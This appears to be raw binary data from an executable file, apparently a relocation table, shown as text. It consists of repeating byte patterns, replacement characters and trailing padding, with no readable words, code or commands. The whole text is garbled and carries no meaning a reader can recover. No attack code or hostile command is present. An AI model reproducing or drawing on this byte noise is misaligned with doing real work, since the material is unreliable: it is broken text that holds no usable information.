444)424N4T4�4�4�4�4�4�4555$5W5|5�5�5�56<6l6x6~6�6�6�6�6�6\7m7�7�7�7�7,8=8�8�899:9B9M9[9d9p9x9�9�9�9�9�9:1:G:f:|:�:�:�:�:�:�:;W;�;�;�;�;�;�;�;�;�;.<<<�<�<�<�<�<�<�<�<==:=H=�=�=�=�=>>&>+>1>;>G>r>�>�>�>�>�>�>�>?!?5?M?Y?b?o?w?|?�?�?�?�?�? �  �  	0040=0B0K0k0r0�0�0�0�0�0�0#111U1g1s1}1�1�1�1�1�1�1�12292I2Y2s2�2�2�2�273_3h3m3v3�3�3�3�34"4+4U4c4x4�4�4�4�4�4�4�4�4�4�45555%5.5<5D5I5O5V5_5o5�5�5�5�5�5�5'6L6|6�6�6�6�6�6�6#7D7R7g7~7�7�7�7�7�7�78,8A8J8t8�8�8�8�8�8�8�8�8�8�899*92979=9D9M9[9c9h9n9u9~9�9�9�9�9�9�9�97:\:�:�:�:�:;;#;W;|;�;�;�;�;<:<H<u<�<�<�<�<�<=,=\=}=�=�=�=�=�=�=�=�=>(>`>n>�>�>�>�>�>�>�>�>�>
?8?O?{?�?�?�?�?�?�?�?�? �  h  
0B0P0m0v0{0�0�0�0�0�0�01&1T1`1�1�1�1�1�1'2L2�2�2�2�2�2�2
333W3|3�3�3�3�3�3�3�3'4;4�4�4�4�4�4�4�4�4�4�4�4	55O5c5�5�5�5�5�5�5"6)646H6O6Z6a6�6�6�6�6�67"7/777<7B7L7X7�7�7�788'8,858Q8t8{8�8�8�8�8�8�8�8�8�899-969;9D9O9X9]9f9�9�9�9�9�9�9�9:':W:k:�:�:�:�:;;H;[;g;q;�;�;�;<;<M<b<k<p<y<�<�<�<===#=[=r=�=�=�=�=�=�=>>>H>_>n>�>�>?0?P?Y?�?�?�?�? �  0  0A0o0�0�0�0�0�01-1B1K1s1�1�1�1�12242N2d2�2�2�2�2�23%3O3k3x3�3�3&4:4X4n4�4�4�455G5P5�5�5�5646X6�6�6�6�6�6�67787R7h7�7�7�7�7�78)8S8o8�8�8�8�8�8909=9W9q9z99�9�9�9�9
::;:I:u:|:�:�:�:�:�:�:;/;>;`;�;�;�;�;�;<<$<-<e<|<�<�<�<�<	==%=U=^=�=�=�=�= >	>>>O>f>u>�>�>�>�>�>?@?Q?{?�?�?�?�?�?   �  0000%010P0y0�0�0�0�0�0�0�0�0�0�0111141]1q1�1�1�1�1�1�1�1�1�1�1�1�122A2U2s2�2�2�2�2�2�23<3M3y3�3�3�3�3�3�344N4_4z4�4�4�4�4�4�4	5%5-52585B5N56$6P6Y6^6g6�6�6�6�6�6�6 77&7-7J7d7s7�7�7�7�7�7�78&8/848=8\8�8�8�8�8999&9^9u9�9�9�9�9�9�9�9::d:x:�:�:�:�:�:�:�:;;);6;>;C;I;S;_;�;�;�;<.<7<<<E<h<o<�<�<�<�<�<�<�<�<(=?=N=�=�=�=�=�=�=>$>N>f>o>�>�>�>�>�>�>�>�>?#?L?`?~?�?�?�?�?�?�?�?�?�?�?�?�?    �  000D0b0o0w0|0�0�0�0�0�0�0�0�0�0�01(1F1`1i1n1w1�1�1�1�1222"2A2f2u2|2�2�2�2�2�2�2333'3_3v3�3�3�3�3�3�3�344e4y4�4�4�4�4�4�4�45515@5U5^5c5h5n5y55�5�5�5�5�5�5�5�5�56/6y6�6�6�6�6�6�67!7'727=7H7X7_7j7p7v7�7�7�7�7�7�7888/8N8V8\8w8�8�8�8�89)92979@9x9�9�9�9�9�9�9�9�9 :4:~:�:�:�:�:�:�:;;1;S;b;n;{;�;�;�;�;�;�;�;?<S<s<|<�<�<�<�<�<�<=#=/=<=D=I=O=Y=e=�=�= >>4>=>B>K>j>�>�>�>�>�>�>�>?
???&?c?w?�?�?�?�?     �  00000%000O0r0y0�0�0�0�0�0�0�0�011L1`1�1�1�1�1�1�1�1222282[2b2�2�2�2�2�23*3H3b3k3p3y3�3�3�3�3�3 4444Y4m4�4�4�4�4�4�45555&5E5h5o5�5�5�5�5�5�5�5 686O6^6~6�6�6�6�6�6�6�6�6�67:7Q7`7�7�7�7�7�7�78"8+80898X8f8o8�8�8�8�8�8�899<9C9q9�9�9�9::C:N:T:^:q:�:�:�:�:�:-;G;V;_;h;q;�;�;<<<!<'<.<7<_<m<�<�<�<�<�<�<�<�<=-=4=J=i=u=~=�=�=�=�=�=> >)>g>�>�>�>�>�>???+?:?Z?_?t?}?�?�?�? 0 �  70Z0b0g0m0w0�0�0�01,1L1U1Z1c1�1�1�1�1�1�1�10282=2C2M2Y2�2�2�23"3+30393X3^3f3k3q3{3�3�3�3404P4Y4^4g4�4�4�4�4�4�45,5Y5`5k5�5�5�5�5�56(6=6R6Y6d6�6�6�6�6777"7+70797X7c7n7�7�7�7�7�7�7/8C8^8{8�8�899b9j9s9�9�9�9�9�9�9�9:5:Q:V:e:y:�:�:�:�:;;;;5;?;V;d;s;�;�;�;�;�;�;�;�;<
<<<<#<)</<<<L<T<]<c<j<o<u<z<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<==!=)=2=7=H=Q=Z=j=t=�=�=�=�=�=�=�=�= >>>(>0>G>r>�>�>�>�>�>�>�>?.?;?A?P?^?y?�?�?�?�?�? @ P  -0Z0`0x0~0�0�0�0�011�1�1�1�1 2%2/2:2J2f2�2�2�2�2�23333=3H3Q3d3q3�3�3�3�3�3�3�3�3�34<4]4l4�4�4�4�4�4�4�4�4(5D5c5�5�5�5�5�5�5�5636S6[6c6w6�6�6�6�6�6�6�6�67*727L7x7�7�7�7�7�7�7�7�7�7�7808^8d8w8�8�8�8�8�8�8�8�8�899)9R9Y9^9d9j99�9�9�9�9�9�9�9�9::(:1:E:U:w:�:�:�:�:�:7;b;�;�;<8<�<�<�<=g=�=�=�=�>�>�>�>�>??&?2?C?�?�?�?�? P   0!000<0_0�0�0�01111 1C1W1|1�1�1�1�12$2Z2a2w2�2�2�21373�3�3�3�3�3�3'4L4{4�4�4�4�5�5�5�5�5W6x6�6�677/7:7h7p7�7�7�7�7�78,8;8L8W8}8�8�8�8�819H9q9�9�9�9�9�9':L:^:p:�:�:�:;;;;C;^;f;�;�;�;�;�;<<6<==)=P=X=}=�=�=�=�=�=�=�=>\>p>�>�>�>?=?Q?�?�?�?�?   ` �   !050m0�0%1g1�1�1�1!2S2�2�2�2(3_3�344�6�6757T7Z9g9�9�9�9�9�9�9:(:w:�:�:�:�:;7;F;w;�;�;�;
<<?<N<�<�<�<�<�<	= =8=Q=`=�=�=�=�=�=%>@>T>b>v>�>�>�>"?K?Y?�?�?�?�? p �    00D0R0�0�0�0�0�01<1B1�1�1�1�12d2�2�2�2�2�2�23343W3u3�3�3�3�3	424:4C4[4o4�4�4�4�4�4�4�45)5D5�5�5�5�5�56%6.6F6�6�6�6�6�6�6�677$7<7\7�7'8{8�829=9w9�9 :�:�:�:J;U;�;�;O<n<�<�<�<p==�=>$>4>:>J> ??0???q?�?�?�?   � �   00_0e0u0{0�0�0�0�0�0/1G1r1~1�1Y2�2�2�2�2�24!4A4O4�4�4�4�45"5O5a5�5�5�5�5�566=6L6!737S7a7�7�7�7�7"848a8s8�8�8�8�8�8$9/9O9^9�9�9:':�:;
;�;�;	<<N<`<�<�<�<==='=P=[={=�=�=�=>>B>_>�>�>�>�>�>"?-?U?e?�?�?�?�?�?�?�?�?   � �    0v0�0�0�0�0�01&1J1U1�1�1�122<2�2�2�2�2 3)31373L3q3y3�3�3�3�3�34+434�4�4�45?5{5�5�5�5�5�5�5
6<6G6b6o6�6�6�6�677(7>7�7�7�7�788868\8g8�8�8�8�8�8�899-9:9c9k9t9�9�9�9�9�9:::7:X:c:~:�:�<�<�<�<=,=^=l=�=�=�=�=�=>5>�>�> � �   X0k0�0�01%191�1�1�1292K2�2<3�3�3)4;4�455U5m5�5�5�5�5�567R7�7�7�7�7	8?8W88�8�8�8�8�8&9.979O9f9k9v9�9�9�9::$:g:�:�:�:�:#;+;4;L;[;�;�;�;�;<<<B<�<�<�<�<===8=}=�=�=�=�=�=�=>'>H>�>�>�>�>�>�>B?K?S?�?�?�? �   00U0]0�0�011d1l1t1�1�1$2C2T2�2�2�2�2�2�21393D3Z3�3�3�3�3�3�384@4M4�4�4�4�4�4�495A5Q5~5�5�5�5�5�5�566>6I6R6o6�6�677,7i7u7�7�7�7
88 8-8�8�8�8�89)969c9k9t9�9�9�9�9:;:C:f:}:�:�:�:;8;l;�;�;�;�;�;�;<r<�<�<�<�<�<U=]=k=�=�=�= >@>h>v>�>�>?8?`?n?�?�?   � �   00r0z0�0�0�01E1U1d1�1�1�12;2C2K2�2�2�2�2�2,343z3�3�3�344'4f4n4�4�4�45#5i5q5�5�5�5�5>6C6M6i6w6�6�6�6<7M7^7�7�7�788-8s8~8�8�8�8�8`9o9�9�9�9�9�9:%:O:^:�:�:�:';/;7;x;�;�;�;�;�;�< =Q=`=�=�=�=
>>">{>�>�>?.?�?�?�?�? � �   )0;0�0�0-1[1�1�1�1272F2Z2{2�2�2�2�2�2?3�3�3)484[4i4�4�4"545C5Y5{5�5�5�5�5�566�6�6�6�67Y7{7�7�7�8�8�8�8K9c9y9�9�9�9�9:1:�: ;;2;@;�;�;�;< <\<�<�<�<�<�=�=>!><>x>�>J?n?�?�? � �   0000�0�01%1H1Y1�1�1�1�1�2�2�2�2�2333E3u3�3�34'4C4Q4Y4�4�475F5i5w5�5�5�5�5�6�6 77H7W7w7�7�7�7*898Y8d8�8�8�8�899=9�9�9Q:`:�:�:�:;D;R;�;<"<3<m<�<�<�<�<
==/=?=O=�=�=�=g>�>"?0?c?�?�?�?   � �   0<0N0^0�0�0�01D1Q1n11�1�12/2~2�2�2�2�2�23�3�344+4R4�4�4�4�4�4h5�5�5�5�5�56666#60666C6I6V6x6�7881888>8E8M8S8m8�8�8�8�89G9R9�>�>�>�>?'?L?p??�?�?�?�?�?�?�?�?�?�?�?�?     �   �0�0�0�0�0�0111$161?1O1~1�1;2U2d2�2F3P3[3�3�3�3�3�4�45,5�5�5/6I6�6�67*7}7838�8�8959y9�9�9:s:�:�:�:v;�;�;�;�;<(<�<�<==7=S=c=u=�=�=�=�=�=�=�=�=�=>&>8>C>J>U>^>}>�>�>�>�>�>�>�>�>�>??<?`?�?�?�?�?�?�?�?�?�?�?  l  00'0V0a0w00�0�0�0�0�01#1+1�1�1�1=2R2Y2d2x2�2�2�2	323;3N3v3�3�3�3�3�34,4g4t4|4�4�4�4�4�4�4�4�4�4575\5�5�5�5�5�5�5�5�56D6R6�6�6�6�6�6�6�6�6
77b7v7�7�7�788�8�8�8�8�89G9U9�9�9�9�9�9�9�9�9::-:g:�:�:�:�:�:�:�:�:;*;8;M;Y;d;�;�;�;�;�;<,<5<B<Q<e<r<x<�<�<�<�<�<�<�<�<�<=,=g=u=�=�=�=�=�=�=�=>&>m>�>�>�>�>�>�>�>???9?E?T?_?i?p?v??�?�?�?�?�?�?�?�?     �  000!050I0W0e0o0v0|0�0�0�01%1D1L1Q1W1a1m1�1�122G2s2�2�2�2�2�2�2�2�2�23.3L3n3z3�3�3�34-454=4�4�4�4�4�4�4�4�405G5l5�5�5�5�5�5�5666+6G6_6h6m6r6x6�6�6�6�6�6�6�6�6�6�6�6%797�7�7�7�7�7�7�7�78)8s8�8�8�8�8�8�8�8�8�89'9r9x9~9�9�9�9�9�9�9�9�9�9�9�9�9�9�9 :::::(:8:?:J:P:V:a:q:x:�:�:�:
;#;5;J;S;X;a;�;�;�;�;�;�;�;y<�<�<�<�<,=B=w=�=�=�=>9>o>�>�>�>�>�>??+???J?�?�?�?�?�?�?   0 @   00/060X0}0�0�0�0�0�011/1=1O1�1�1�1�1�1�12'2L2p2�2                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              